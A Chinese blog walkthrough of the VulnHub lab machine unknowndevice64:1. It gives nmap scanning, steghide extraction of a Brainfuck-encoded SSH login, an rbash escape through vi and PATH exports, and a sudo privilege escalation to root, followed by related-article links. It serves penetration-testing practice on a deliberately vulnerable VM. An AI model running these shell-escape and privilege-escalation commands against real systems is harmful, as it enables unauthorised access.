unknowndevice64: 1靶机

最新推荐文章于 2024-09-11 21:45:27 发布
最新推荐文章于 2024-09-11 21:45:27 发布
阅读量398 收藏 4
点赞数 5
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84564260/article/details/141122425
版权

信息收集

靶机IP扫描

nmap 192.168.93.0/24

端口扫描,开放1337-ssh端口服务,31337-http端口服务;

nmap -A 192.168.93.164 -p-

进行页面访问

查看源码,发现隐藏目录:Key_is_hidd3n.jpg

访问这张图片

下载图片到本地,可使用kali中的工具steghid(开源隐写程序)

用steghide进行提取其中的文本信息:

steghide extract -sf key_is_h1dd3n.jpg

提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;文件信息为一种brainfuck的程序语言,使用在线工具El Brainfuck,或者Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]在线解密后即可获取到ssh的用户名和密码;

得到账号密码:ud64:1M!#64@ud

获取shell

登录靶机ssh ud64@192.168.93.164 -p 1337

发现好多命令被限制,竟然是rbash的shell;

发现vi和 export命令可以使用

[export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量]

在vi命令行下输入!/bin/bash即可顺利进入bash

通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:

export SHELL=/bin/bash:$SHELL

export PATH=/usr/bin:$PATH

export PATH=/bin:$PATH

vi
按shift+:
!/bin/bash

export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH

提权

sudo -l

sudo sysud64 -o /dev/null /bin/bash

Clearlove~7
关注
靶机渗透—unknowndevice64
ray_kong的博客
04-04 4485
渗透unknowndevice64下载地址渗透IP扫描端口扫描http端口访问ssh端口访问rbash逃逸提权 下载地址 download unknowndevice64 地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/ 渗透 IP扫描 sudo arp-scan -l //确定靶机IP地址 扫描到的靶机IP地址是 192.168.10.129 端口扫描 sudo nmap -p- 192.168.10.129 //靶机开放端口 sud
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1204
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
Kali Steghide开源隐写工具
@小张小张的博客
09-15 6857
隐藏文件到图片或音频中——Kali linux Steghide工具 [此博文包含图片] (2016-11-28 10:49:00) 转载 ▼ 分类: 工具 介绍 Kali Linux操作系统通常被一些安全专家和网络罪犯用来做渗透和审计工作,但是除此之外,这里介绍一个另外的特别的功能:将目标文件隐藏到图片或者音频中。(看起来好诱人的样子,有没有跃跃欲试的感觉,_) 2. 安装steghide工具到Kali linux中 如果你的Kali Linux还没有更新过的话,那么执行以下命令进行更新。   # a
steghide实现字典破解功能
weixin_30911451的博客
05-17 508
steghide是一个隐写术软件,可以在图片、音频等文件里隐藏数据。 鉴于原始的steghide在解密数据时不能选择字典文件破解,于是本人就用python简单地为其实现字典破解功能。 ---------- 1、安装steghide *由于steghide太老了,不建议源码安装,我尝试在Kali、Ubuntu上安装各种失败,github上那个实现-pf字典文件破解的项目安装源码也是失败。(当...
steghide隐写术必备工具
01-18
steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具
隐写术之steghide的使用
weixin_30603633的博客
03-17 1225
steghide不是一个软件,所以下载之后解压缩就可以在命令行中使用。 win+R,cmd,回车->进入到steghide.exe所在的文件夹,使用隐藏或者解锁的相应命令,即可隐藏或者解锁。 这个命令有点小bug,因为运行之后并没有生成123456的目标图片,而是原来的图片中有“秘密”了而已。 转载于:https://www.cnblogs.com/BASE64/p/1054841...
靶机渗透测试(unknowndevice64: 1)
@小张小张的博客
09-15 944
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(中等) 目标:成功渗透进入靶机,获取root权限并且读取/root/flag.txt 。 渗透流程: 1.探测主机ip(netdiscover -i eth0 -r 网关) 2.nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶机ip 发现
怎么修复unknowndevice
09-11
### 回答1: Unknown Device是指电脑在设备管理器中无法识别的未知设备。修复方法有以下几种: 1. 更新驱动程序:右键点击未知设备,选择“更新驱动程序”,尝试使用Windows更新或手动下载并安装适用于该设备的驱动...
计算机硬件查看软件UnknownDevice
02-28
UnknownDevice对计算机的所有硬件进行查看,方便好用。
Qt提示QPainter::begin: Paint device returned engine == 0, type:0/1/2/3...,type数值代表什么
kun的专栏
03-25 1万+
最近在做一个绘图应用,经常会在调试的时候看到QPainter::begin: Paint device returned engine == 0, type:1/2/3之类的警告。一直对type代表的具体内容不解,前几天看了看QPainter的源码,恍然大悟~     d->engine = pd->paintEngine(); if (!d->engine) {
steghide隐写术
journeyIT的博客
01-10 836
steghide隐写术 安装 apt-get install steghide   steghide --help   vim test.txt 输入 journeyIT 1. steghide embed -cf [图片文件载体] -ef [待隐藏文件] 2. [回车] 3. 输入密码,提取文件时用到,如果不想设密码,直接按回车 4. [EN...
图像隐写工具---steghide
热门推荐
Hydra的博客
11-10 2万+
背景 先简单描述一下该隐写工具,该工具是在一个隐写rose的题中做到的,也是试了很多种方法,什么stegslove,wbstego,只要是我有的工具基本都试过了,还有其他一些隐写套路,改后缀爆破等等,反正没有得出答案。看了一下题解,需要用到steghide这个工具。 steghide介绍 Steghide是一款开源的隐写术软件,它可以让你在一张图片或者音频文件中隐藏你的秘密信息,而且你不会注...
steghide隐写术-医者仁心
小龙在线
08-28 322
steghide项目地址:https://github.com/StefanoDeVuono/steghide $steghide extract -sf doctor.jpg -p doctor wrote extracted data to "1.txt". cat 1.txt flag{671642b5-e911-
STM32学习笔记(二、初识stm32单片机)
tommorrowwill的博客
09-10 770
首先stm32是意法半导体公司(ST)使用ARM公司的Cortex-M为核心生产的32位的单片机。其中,ST---意法半导体公司,即SOC厂商。M---为Microelectronics的缩写,即微型处理器。32---表示控制器为32位的。103---表示F系列的子系列。
C++学习笔记----6、内存管理(五)---- 智能指针(3)
weixin_71738303的博客
09-11 1138
与指向特定类型的原始指针可以转化为不同类型的指针一样,shared_ptr保存特定的类型可以转化为一个另一种类型的shared_ptr。转化shared_ptr的函数是const_pointer_cast(),dynamic_pointer_cast(),static_pointer_cast()和reinterpret_pointer_cast()。前面简要提过,当拥有共享属主的智能指针,例如shared_ptr不在活动范围或者被重置时,只有它是最后指向的智能指针时才能释放其指向的资源。
【学习笔记】手写Tomcat 二
最新发布
LearnTech_123的博客
09-11 1095
在昨天的基础上,再进一步优化,能够响应HTML文件,图片等静态资源。
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 814
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值